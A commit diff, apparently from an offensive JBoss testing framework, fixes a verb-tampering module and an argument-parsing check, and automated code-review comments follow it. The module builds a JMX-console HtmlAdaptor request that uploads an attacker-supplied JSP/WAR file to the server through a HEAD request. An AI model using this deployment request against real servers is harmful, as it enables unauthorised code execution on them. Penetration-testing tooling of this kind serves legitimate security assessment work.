Few more Verb Tampering fixes
* src/core/auxengine.py
  -- Sanity check
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Modified debug message to be more...correct
  -- Fixed up the deploy URL; not sure how this got so messed up
hatRiot committed Jan 25, 2015
1 parent cac3b14 commit d4fc21e
Showing 2 changed files with 4 additions and 5 deletions.
2 changes: 1 addition & 1 deletion src/core/auxengine.py
@@ -88,7 +88,7 @@ def build_platform_flags(platform, egroup):
if not 'flag' in dir(mod):
continue

if 'enable_args' in dir(mod):
if 'enable_args' in dir(mod) and mod.enable_args:
egroup.add_argument("--%s" % mod.flag, action='store', help=SUPPRESS)
else:
egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
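Review bot: The changed condition `'enable_args' in dir(mod) and mod.enable_args` checks existence through `dir()` and then truthiness, which `getattr(mod, 'enable_args', False)` expresses in one step; the context line `if not 'flag' in dir(mod)` would likewise read better as `if not hasattr(mod, 'flag')`. The `store` branch also omits `dest=mod.flag` while the `store_true` branch passes it, so a flag containing `-` would end up under a different attribute name in the two cases; worth confirming that this is intended. `build_platform_flags` starts and ends outside this hunk.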
7 changes: 3 additions & 4 deletions src/platform/jboss/auxiliary/verb_tamper.py
@@ -30,7 +30,7 @@ def run(self, fingerengine, fingerprint):
by submitting requests with different HTTP verbs, such as HEAD.
"""

utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
utility.Msg("Deploying %s via verb tampering" % fingerengine.options.ip,
LOG.DEBUG)

url = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
@@ -43,9 +43,8 @@ def run(self, fingerengine, fingerprint):
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
"&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format(
war_file.replace('.jsp', '.war'), war_name,
quote_plus(open(war_file).read()))
"&arg0={0}.war&arg1={0}&arg2=.jsp&arg3={1}&arg4=True".format(
war_name, quote_plus(open(war_file).read()))

response = utility.requests_head(url + tamper)
if response.status_code == 200:
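Review bot: `open(war_file).read()` inside the `.format(...)` call never explicitly closes the file, and an unreadable path raises from the middle of the URL build; reading it first with `with open(war_file) as f: payload = quote_plus(f.read())` keeps that failure separate from the request. `war_name` is interpolated twice into the query string unescaped while the file content goes through `quote_plus`, so unless `parse_war_path` (not shown here) already restricts it, the two arguments are handled inconsistently. A short comment above `tamper` stating that the string is sent as a HEAD request to the JMX console's `HtmlAdaptor` with `action=invokeOp` would document the request shape for anyone matching it against server logs. `run` starts and ends outside the hunks shown.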
